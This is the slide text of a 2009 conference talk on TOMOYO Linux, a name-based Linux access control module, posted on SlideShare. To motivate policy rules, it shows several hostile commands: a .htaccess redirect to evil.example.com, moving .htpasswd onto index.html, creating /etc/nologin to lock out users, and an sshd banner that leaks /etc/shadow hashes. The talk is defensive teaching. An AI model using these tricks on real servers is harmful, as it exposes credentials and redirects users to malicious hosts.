SlideShare una empresa de Scribd logo

Deep inside TOMOYO Linux

Descargar como PPTX, PDF
Toshiharu Harada, Ph.D
Toshiharu Harada, Ph.D

Linux.Conf.Au 2009

TecnologíaEmpresariales
1 de 32
Copyright (C) 2009 NTT DATA CORPORATION Deep inside TOMOYO Linux Linux.Conf.Au 2009 2009.1.20 TOMOYO Linux Project Handa Tetsuo TOMOYO is a registered trademark of NTT DATA CORPORATION in Japan. Linux is a trademark of Linus Torvalds. Other names and trademarks are the property of their respective owners.
Copyright (C) 2009 NTT DATA CORPORATION Two versions of TOMOYO Version 1.6.x Not using LSM. Full featured version. This material refers to this version. Supports many kernels/distributions including 2.4 kernels. Version 2.2.x Modified to use LSM for mainline inclusion. Proposal in progress. Minimal subset of 1.6.x . 1 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? The "name" based access control has been unpopular among security professionals. Because whether a file is readable and/or writable and/or executable depends on the location of that file. But, we had better not to neglect the role of "name" in security. Or, we will get undesirable consequence. 2 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? As long as a file's contents are stored in an inode, the contents could be separated/protected by "label" based access control. But when the contents are copied to userspace and mixed by applications, the "label" of the contents is lost. Thus, we should be aware with factors that control how the contents are processed. The "name" is one of such factors. 3 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION What is TOMOYO's argument? Factors that affect security Program's code Files accessed by programs User's input Pathname (i.e. the location of a file) Command line arguments (a.k.a. argv[]) Environment variables (a.k.a. envp[]) and more? TOMOYO tries to care "name" factors. 4 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Customer's Demand We want to upload web contents via CGI/FTP/SFTP/TAR etc. Filename the administrator is expecting: /var/www/html/plaintext.txt Contents the administrator is expecting: Hello world! We want to let Apache serve the web contents. 5 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Question How can we avoid below case? Filename actually created: /var/www/html/.htaccess Contents actually written: RedirectMatch (.*) http://evil.example.com/cgi-bin/poison-it?$1 Apache will interpret .htaccess and return "302 Moved Temporarily" to clients. The clients will be redirected to malicious server. 6 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : Question People are aware with cross site scripting vulnerability. It is an application level problem. Are people also aware with redirection vulnerability? http://isc.sans.org/diary.html?storyid=5150 It is an OS involved problem. Don't we have some rooms for protection? 7 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 1 : TOMOYO's Solution You can use "" (name subtraction operator) to avoid exercising unwanted pathnames. Only access controls which care "name" factor can do. Below is an example that doesn't allow creation of filename which begins with "." so that files like .htaccess won't be created. allow_create /var/www/html/. 8 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : Customer's Demand We need to execute /bin/cat /bin/mv /bin/rm and some more commands from Apache's CGI. 9 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : Question What happens if the CGI has a security hole that allows below operation? $ /bin/mv /var/www/html/.htpasswd /var/www/html/index.html Apache will interpret index.html and return the contents of .htpasswd (i.e. password information) to clients. The administrator won't want Apache to do so. 10 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 2 : TOMOYO's Solution Control what filenames are created/deleted/opened by the CGI. The "name" based access control can forbid use of inappropriate names. Change security context of a process whenever a program is executed. /bin/cat /bin/mv /bin/rm and some more commands will have different set of pathnames that are allowed to exercise. 11 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : Customer's Demand We want to prevent administrator from blocking general users. 12 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : Question What happens if the administrator issues the following operation? # ln /etc/resolv.conf /etc/nologin The administrator can prevent the general users from logging in, if the administrator is allowed to create a file named /etc/nologin . 13 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 3 : TOMOYO's Solution You can restrict what names the administrator and the general users can create/delete/rename/link. You can restrict namespace changes (e.g. mount/umount/chroot/pivot_root). 14 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Customer's Demand We want to divide administrator's tasks. We want to forbid operations that will leak /etc/shadow . # cat /etc/shadow Hey, there is a plenty room for criticizing "name" based access control! No, that’s not what I wanted to say here. 15 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Question We need to grant read access to /etc/shadow to applications which authenticate a user. /bin/login /bin/su /usr/sbin/sshd Then, why not consider "How /etc/shadow is used by such applications?" I'm talking about behaviors after the contents of /etc/shadow are copied to userspace. This is not a battle of "name" versus "label". 16 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : Question Wow! Can you accept this? Using /etc/shadow as a banner. # /usr/sbin/sshd -o 'Banner /etc/shadow' # ssh localhost root:$1$d8kgaeX7$PqJEIeNsGAGPw4WwiVy0C/:14217:0:99999:7::: bin:*:14189:0:99999:7::: daemon:*:14189:0:99999:7::: adm:*:14189:0:99999:7::: lp:*:14189:0:99999:7::: sync:*:14189:0:99999:7::: shutdown:*:14189:0:99999:7::: (…snipped…) kumaneko:$1$Y1sTeizV$y59KJ5302WPGh9rw8kGU50:14217:0:99999:7::: root@localhost's password: 17 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 4 : TOMOYO's Solution You can control command line parameters and environment variables. Because they are factors that control how the contents are processed. Here are some examples. allow_execute /usr/sbin/sshd if exec.argc=1 allow_execute /bin/sh if exec.argc=3 exec.argv[1]="-c" exec.argv[2]="/bin/mail" exec.envp["PATH"]="/bin:/usr/bin" 18 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 5 : Customer's Demand We have to allow execution of /bin/sh from our server application. Parameters given to /bin/sh are variable, but we don't want to allow use of arbitrary parameters. We want to control not only commands but also command line parameters and environment variables. 19 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 5 : TOMOYO's Solution You can validate/record/detoxify parameters and do setup procedure (e.g. mounting private /tmp/ partition) using "execute_handler" keyword. Below example lets /usr/bin/check-cgi-param intercept program execution request. execute_handler /usr/bin/check-cgi-param 20 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 6 : Customer's Demand We want to assign different permissions based on client's IP address and/or port number. 21 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 6 : TOMOYO's Solution You can manage process's state using "task.state" keyword. allow_network TCP accept @network1 1024-65535 ; set task.state[0]=1 allow_network TCP accept @network2 1024-65535 ; set task.state[0]=2 22 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 7 : Customer's Demand We want to accept policy violation caused by software updates so that the service can restart properly after software updates. 23 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 7 : TOMOYO's Solution You can interactively handle policy violation in enforcing mode. To handle (library file's) pathname changes. To handle (irregular) signal requests. To examine whether the restarted service can work properly. 24 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 8 : Customer's Demand We want to protect our system from SSH brute force attacks. We can't use public key authentication because we are not allowed to use removable media. 25 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Scenario 8 : TOMOYO's Solution You can insert fully customizable extra authentication layer between the SSH server process and the login shell process. TOMOYO's process invocation history allows you to design process's state transition diagram. You can insert any setup programs into state transition diagram and enforce it. 26 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION What versions can TOMOYO 1.6.x support? Vanilla kernels since 2.4.30/2.6.11. Many distributions' latest kernels. RedHat Linux 9 Fedora Core 3/4/5/6 Fedora 7/8/9/10 CentOS 3.9/4.7/5.2 Debian Sarge/Etch/Lenny OpenSUSE 10.1/10.2/10.3/11.0/11.1 Ubuntu 6.06/6.10/7.04/7.10/8.04/8.10 Asianux Server 2.0/3.0 Vine Linux 4.2 Nature’s Linux 1.6 Gentoo Hardened Gentoo Mandriva 2008.1/2009.0 Turbolinux Server 10/11 Turbolinux Client 2008 27 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Why TOMOYO 1.6.x doesn't use LSM? Not all hooks are provided. Minimal hooks for implementing TOMOYO 2.2.0 were merged in 2.6.28-git4 . TOMOYO needs more LSM hooks. Hooks for socket's accept()/recvmsg() operations. Hooks for non POSIX capability. Hooks for interactive enforcing mode. To support 2.4 kernels. 28 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Why TOMOYO 1.6.x doesn't use LSM? TOMOYO wants to coexist with other security mechanisms. We now understand unexpected "name" causes unexpected behaviors, don't we? Controlling only "label" is not sufficient. We need to also control "name". But current LSM is *exclusive*. I hope LSM will become stackable so that we can enable multiple LSM modules at the same time. 29 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Conclusion? The "name" based MAC is an inferior solution compared to the "label" based MAC if we care only whether a file is readable and/or writable and/or executable. But there are "name" specific advantages if we care other aspects in security. TOMOYO is a "name" based MAC which compensates for "label" based MAC's shortage. 30 2009.1.20
Copyright (C) 2009 NTT DATA CORPORATION Materials? The role of "pathname based access control" in security. http://sourceforge.jp/projects/tomoyo/docs/lfj2008-bof.pdf "Why TOMOYO Linux?" http://sourceforge.jp/projects/tomoyo/docs/tlug200805.pdf All materials are available at http://sourceforge.jp/projects/tomoyo/docs/?category_id=532&language_id=1 31 2009.1.20

Recomendados

Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4Nutan Kumar Panda
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Flex Remoting and Messaging (2010)
Flex Remoting and Messaging (2010)Flex Remoting and Messaging (2010)
Flex Remoting and Messaging (2010)Christopher Grant
 
ComSys2009
ComSys2009ComSys2009
ComSys2009Toshiharu Harada, Ph.D
 
Job's 2005 Stanford Speech Translation Kit
Job's 2005 Stanford Speech Translation KitJob's 2005 Stanford Speech Translation Kit
Job's 2005 Stanford Speech Translation KitToshiharu Harada, Ph.D
 
Why TOMOYO Linux?
Why TOMOYO Linux?Why TOMOYO Linux?
Why TOMOYO Linux?Toshiharu Harada, Ph.D
 
CaitSith 新しいルールベースのカーネル内アクセス制御
CaitSith 新しいルールベースのカーネル内アクセス制御CaitSith 新しいルールベースのカーネル内アクセス制御
CaitSith 新しいルールベースのカーネル内アクセス制御Toshiharu Harada, Ph.D
 
Tomoyo linux introduction
Tomoyo linux introductionTomoyo linux introduction
Tomoyo linux introductionToshiharu Harada, Ph.D
 

Recomendados

Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4Nutan Kumar Panda
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Flex Remoting and Messaging (2010)
Flex Remoting and Messaging (2010)Flex Remoting and Messaging (2010)
Flex Remoting and Messaging (2010)Christopher Grant
 
ComSys2009
ComSys2009ComSys2009
ComSys2009Toshiharu Harada, Ph.D
 
Job's 2005 Stanford Speech Translation Kit
Job's 2005 Stanford Speech Translation KitJob's 2005 Stanford Speech Translation Kit
Job's 2005 Stanford Speech Translation KitToshiharu Harada, Ph.D
 
Why TOMOYO Linux?
Why TOMOYO Linux?Why TOMOYO Linux?
Why TOMOYO Linux?Toshiharu Harada, Ph.D
 
CaitSith 新しいルールベースのカーネル内アクセス制御
CaitSith 新しいルールベースのカーネル内アクセス制御CaitSith 新しいルールベースのカーネル内アクセス制御
CaitSith 新しいルールベースのカーネル内アクセス制御Toshiharu Harada, Ph.D
 
Tomoyo linux introduction
Tomoyo linux introductionTomoyo linux introduction
Tomoyo linux introductionToshiharu Harada, Ph.D
 
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Toshiharu Harada, Ph.D
 
The role of "pathname based access control" in security"
The role of "pathname based access control" in security"The role of "pathname based access control" in security"
The role of "pathname based access control" in security"Toshiharu Harada, Ph.D
 
Importance of APIs in the Internet of Things
Importance of APIs in the Internet of ThingsImportance of APIs in the Internet of Things
Importance of APIs in the Internet of ThingsNordic APIs
 
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...VirtualTech Japan Inc.
 
Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingTom Keetch
 
Tutorial mikrotik step by step
Tutorial mikrotik step by stepTutorial mikrotik step by step
Tutorial mikrotik step by stepDewa Ketut Setiawan
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Setup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE networkSetup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE networkNazmul Hossain Rakib
 
Call your key to phone all
Call your key to phone allCall your key to phone all
Call your key to phone allGerard Fuguet
 
X Means Y
X Means YX Means Y
X Means YCommonsWare
 
AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on Kel
 
Information on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHMInformation on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHMHTS Hosting
 
Connect2016 Shipping Domino
Connect2016 Shipping DominoConnect2016 Shipping Domino
Connect2016 Shipping DominoFactor-y S.r.l.
 
Connect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping dominoConnect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping dominoMatteo Bisi
 
Containerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud MigrationContainerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud MigrationAmazon Web Services
 
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...Amazon Web Services
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18Max Kleiner
 
Technology And Life
Technology And LifeTechnology And Life
Technology And LifeSunil Swain
 
Technology And Life
Technology And LifeTechnology And Life
Technology And LifeSunil Swain
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
20090703 tomoyo thankyou
20090703 tomoyo thankyou20090703 tomoyo thankyou
20090703 tomoyo thankyouToshiharu Harada, Ph.D
 
’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs says’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs saysToshiharu Harada, Ph.D
 

Más contenido relacionado

Similar a Deep inside TOMOYO Linux

Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Toshiharu Harada, Ph.D
 
The role of "pathname based access control" in security"
The role of "pathname based access control" in security"The role of "pathname based access control" in security"
The role of "pathname based access control" in security"Toshiharu Harada, Ph.D
 
Importance of APIs in the Internet of Things
Importance of APIs in the Internet of ThingsImportance of APIs in the Internet of Things
Importance of APIs in the Internet of ThingsNordic APIs
 
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...VirtualTech Japan Inc.
 
Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingTom Keetch
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Setup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE networkSetup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE networkNazmul Hossain Rakib
 
Call your key to phone all
Call your key to phone allCall your key to phone all
Call your key to phone allGerard Fuguet
 
AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on Kel
 
Information on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHMInformation on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHMHTS Hosting
 
Connect2016 Shipping Domino
Connect2016 Shipping DominoConnect2016 Shipping Domino
Connect2016 Shipping DominoFactor-y S.r.l.
 
Connect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping dominoConnect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping dominoMatteo Bisi
 
Containerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud MigrationContainerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud MigrationAmazon Web Services
 
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...Amazon Web Services
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18Max Kleiner
 
Technology And Life
Technology And LifeTechnology And Life
Technology And LifeSunil Swain
 
Technology And Life
Technology And LifeTechnology And Life
Technology And LifeSunil Swain
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 

Similar a Deep inside TOMOYO Linux (20)

Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
 
The role of "pathname based access control" in security"
The role of "pathname based access control" in security"The role of "pathname based access control" in security"
The role of "pathname based access control" in security"
 
Importance of APIs in the Internet of Things
Importance of APIs in the Internet of ThingsImportance of APIs in the Internet of Things
Importance of APIs in the Internet of Things
 
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
NTT Docomo's Challenge looking ahead the world pf 5G × OpenStack - OpenStack最...
 
Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical Sandboxing
 
Tutorial mikrotik step by step
Tutorial mikrotik step by stepTutorial mikrotik step by step
Tutorial mikrotik step by step
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Setup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE networkSetup VoIP System and Interconnection with LTE network
Setup VoIP System and Interconnection with LTE network
 
Call your key to phone all
Call your key to phone allCall your key to phone all
Call your key to phone all
 
X Means Y
X Means YX Means Y
X Means Y
 
AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on AMIMOTO WordPress + Amazon Web Services Hands-on
AMIMOTO WordPress + Amazon Web Services Hands-on
 
Information on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHMInformation on Tomcat in cPanel & WHM
Information on Tomcat in cPanel & WHM
 
Connect2016 Shipping Domino
Connect2016 Shipping DominoConnect2016 Shipping Domino
Connect2016 Shipping Domino
 
Connect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping dominoConnect2016 - 1172 Shipping domino
Connect2016 - 1172 Shipping domino
 
Containerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud MigrationContainerize Legacy .NET Framework Web Apps for Cloud Migration
Containerize Legacy .NET Framework Web Apps for Cloud Migration
 
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
Mythical Mysfits - Monolith to microservices with Docker and Fargate - MAD305...
 
Maxbox starter18
Maxbox starter18Maxbox starter18
Maxbox starter18
 
Technology And Life
Technology And LifeTechnology And Life
Technology And Life
 
Technology And Life
Technology And LifeTechnology And Life
Technology And Life
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 

Más de Toshiharu Harada, Ph.D

’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs says’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs saysToshiharu Harada, Ph.D
 
振る舞いに基づくSSHブルートフォースアタック対策
振る舞いに基づくSSHブルートフォースアタック対策振る舞いに基づくSSHブルートフォースアタック対策
振る舞いに基づくSSHブルートフォースアタック対策Toshiharu Harada, Ph.D
 
僕より少し遅く生まれてきた君たちへ
僕より少し遅く生まれてきた君たちへ僕より少し遅く生まれてきた君たちへ
僕より少し遅く生まれてきた君たちへToshiharu Harada, Ph.D
 
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」Toshiharu Harada, Ph.D
 
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」Toshiharu Harada, Ph.D
 
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...Toshiharu Harada, Ph.D
 
プロセス実行履歴に基づくアクセスポリシー自動生成システム
プロセス実行履歴に基づくアクセスポリシー自動生成システムプロセス実行履歴に基づくアクセスポリシー自動生成システム
プロセス実行履歴に基づくアクセスポリシー自動生成システムToshiharu Harada, Ph.D
 
使いこなせて安全なLinuxを目指して
使いこなせて安全なLinuxを目指して使いこなせて安全なLinuxを目指して
使いこなせて安全なLinuxを目指してToshiharu Harada, Ph.D
 
Linuxセキュリティ強化エッセンシャル
Linuxセキュリティ強化エッセンシャルLinuxセキュリティ強化エッセンシャル
Linuxセキュリティ強化エッセンシャルToshiharu Harada, Ph.D
 
闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座Toshiharu Harada, Ph.D
 
TOMOYO Linux on Android (Taipei, 2009)
TOMOYO Linux on Android (Taipei, 2009)TOMOYO Linux on Android (Taipei, 2009)
TOMOYO Linux on Android (Taipei, 2009)Toshiharu Harada, Ph.D
 
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)Toshiharu Harada, Ph.D
 
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...Toshiharu Harada, Ph.D
 

Más de Toshiharu Harada, Ph.D (20)

20090703 tomoyo thankyou
20090703 tomoyo thankyou20090703 tomoyo thankyou
20090703 tomoyo thankyou
 
’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs says’You’ve got to find what you love,’ Jobs says
’You’ve got to find what you love,’ Jobs says
 
TOMOYO Linuxのご紹介
TOMOYO Linuxのご紹介TOMOYO Linuxのご紹介
TOMOYO Linuxのご紹介
 
LSM Leaks
LSM LeaksLSM Leaks
LSM Leaks
 
Your First Guide to "secure Linux"
Your First Guide to "secure Linux"Your First Guide to "secure Linux"
Your First Guide to "secure Linux"
 
振る舞いに基づくSSHブルートフォースアタック対策
振る舞いに基づくSSHブルートフォースアタック対策振る舞いに基づくSSHブルートフォースアタック対策
振る舞いに基づくSSHブルートフォースアタック対策
 
僕より少し遅く生まれてきた君たちへ
僕より少し遅く生まれてきた君たちへ僕より少し遅く生まれてきた君たちへ
僕より少し遅く生まれてきた君たちへ
 
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」
20031030 「読み込み専用マウントによる改ざん防止Linuxサーバの構築」
 
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」
20031020 「プロセス実行履歴に基づくアクセスポリシー自動生成システム」
 
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...
Chained Enforceable Re-authentication Barrier Ensures Really Unbreakable Secu...
 
プロセス実行履歴に基づくアクセスポリシー自動生成システム
プロセス実行履歴に基づくアクセスポリシー自動生成システムプロセス実行履歴に基づくアクセスポリシー自動生成システム
プロセス実行履歴に基づくアクセスポリシー自動生成システム
 
TOMOYO Linux
TOMOYO LinuxTOMOYO Linux
TOMOYO Linux
 
使いこなせて安全なLinuxを目指して
使いこなせて安全なLinuxを目指して使いこなせて安全なLinuxを目指して
使いこなせて安全なLinuxを目指して
 
TOMOYO Linuxへの道
TOMOYO Linuxへの道TOMOYO Linuxへの道
TOMOYO Linuxへの道
 
Linuxセキュリティ強化エッセンシャル
Linuxセキュリティ強化エッセンシャルLinuxセキュリティ強化エッセンシャル
Linuxセキュリティ強化エッセンシャル
 
闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座
 
TOMOYO Linux on Android (Taipei, 2009)
TOMOYO Linux on Android (Taipei, 2009)TOMOYO Linux on Android (Taipei, 2009)
TOMOYO Linux on Android (Taipei, 2009)
 
TOMOYO Linux on Android
TOMOYO Linux on AndroidTOMOYO Linux on Android
TOMOYO Linux on Android
 
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)
Kernel Development: Drawing Lessons from "Mistakes" (Japan Linux Symposium 2009)
 
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...
PacSec2007: TOMOYO Linux: A Practical Method to Understand and Protect Your O...
 

Último

Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
